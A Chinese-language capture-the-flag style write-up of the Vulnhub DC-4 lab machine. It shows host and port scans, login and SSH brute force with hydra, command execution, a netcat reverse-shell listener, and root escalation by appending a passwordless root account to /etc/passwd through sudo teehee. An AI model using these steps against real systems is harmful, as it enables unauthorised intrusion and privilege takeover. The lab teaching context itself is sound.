渗透测试靶机vulnhub——DC4实战笔记
信息收集
fscan扫描存活主机
PS C:\Users\lenovo\Desktop\HackTool> .\fscan64.exe -h 192.168.1.0/24___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.53 is alive
(icmp) Target 192.168.1.108 is alive
(icmp) Target 192.168.1.1 is alive
(icmp) Target 192.168.1.104 is alive
(icmp) Target 192.168.1.105 is alive
(icmp) Target 192.168.1.109 is alive
[*] Icmp alive hosts len is: 6
确定目标主机是192.168.1.105
namp扫描端口
nmap -A 192.168.1.105 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 10:11 CST
Nmap scan report for 192.168.1.105
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
zsh: segmentation fault nmap -A 192.168.1.105 -p-
开放了22和80端口,直接访问web服务
![](/assets/blank.gif)
就一个登录框
暴力破解
直接爆破密码
![](/assets/blank.gif)
爆出密码是happy
![](/assets/blank.gif)
命令执行
登进去一看是命令执行漏洞
![](/assets/blank.gif)
抓包修改参数,查看用户
![](/assets/blank.gif)
查看到有三个用户,charles、jim、sam
![](/assets/blank.gif)
nc反弹shell
nc -lvp 9999
![](/assets/blank.gif)
python切换shell
python3 -c "import pty;pty.spawn('/bin/bash')"
![](/assets/blank.gif)
在/home/jim目录下发现文件old-passwords.bak文件,查看,可以作为爆破ssh的密码字典
![](/assets/blank.gif)
复制保存到kali
爆破ssh
└─$ sudo hydra -l jim -P pass.txt ssh://192.168.1.105
最后密码是jibril04
![](/assets/blank.gif)
登录提示you have mail
![](/assets/blank.gif)
存在Charles的密码Password is: ^xHhA&hvim0y
切换用户
su charles
sudo提权
sudo -l
![](/assets/blank.gif)
有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户
teehee提权
passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
echo "yesir::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
![](/assets/blank.gif)
![](/assets/blank.gif)
flag
![](/assets/blank.gif)
他帮你驱散黑暗,我却带给你光明。可,你心里没有我
![](/assets/blank.gif)
渗透测试靶机vulnhub——DC4实战笔记相关推荐
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Vulnhub靶机DC9渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SQL注入: ③:文件包含: ④: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC3
Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
Vulnhub靶机My File Server: 2渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Vulnhub靶机My File Server: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1
Vulnhub靶机MoneyBox: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP匿名登入: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——Source:1
Vulnhub靶机Source:1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:远程命令执行漏洞 CVE ...
最新文章
- 增强型固态硬盘支持人工智能工作负载
- sass @function,@for,@mixin 的应用
- center6linux ip设置,centos6固定ip地址
- 字典树实现_反怼面试官系列之 字典树
- Android init第三、四部分详细分析
- 字符集编码详解【ASCII 、GB2312、GBK、GB18030、unicode、UTF-8】(转)
- leetcode 446. Arithmetic Slices II - Subsequence | 446. 等差数列划分 II - 子序列(动态规划)
- 还要什么ETL?它是搭建数据仓库的必备,许多人都不知道!
- 学习有五个层次和境界
- 单链表尾指针要置为空?为什么单链表建立完以后,比如p指向尾节点,要加上一句p-next=NULL;?
- 关于原理图库和封装库设计(三)
- USB转232和485的区别
- 分库分表中间件常见方案对比分析
- bzoj 1779: [Usaco2010 Hol]Cowwar 奶牛战争 (网络流)
- element-upload 自定义上传、限制文件大小、格式以及图片尺寸
- clear:both在HTML页面中的用法
- [转载]【职场新人必看】领导谆谆寄语
- 基于yolov5与改进VGGNet的车辆多标签实时识别算法
- DSP仿真器的必要性及原理
- vue中watch的初次监听和深度监听
热门文章
- java项目——Dom4j读取XML文件保存orecal数据库
- uos专业版激活_UOS V20专业版新增了什么,UOS更新内容一览
- Python计时库——Time库的使用详解
- 李琰php_李琰:贰拾年一觉轮滑梦
- MQTT协议详解,非常易懂
- Raphael绘制流程图(二),添加带箭头的直线
- MT6771/6761/6762 安卓手机主板 dconfig 控制 mrdump 开关去除 SOCID 绑定
- 最新微信ipad协议, CODE获取 公众号授权等
- Android开发:使用Viewpager模仿驾考宝典试卷答题界面
- 在win7下配置Geany,使其使用 Python 3